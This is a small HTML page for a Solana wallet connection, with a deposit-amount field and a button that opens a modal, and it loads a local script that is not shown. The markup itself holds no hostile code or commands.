<!DOCTYPE html>
<html lang="en">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0"><script src="./index.js"></script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Wallet Connection</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <div class="input-group">
            <input type="text" id="amount" placeholder="DEPOSIT AMOUNT (in SOL)">
        </div>
            <button class="connect-wallet">Open Modal</button>
    </div>
</body>
</html>
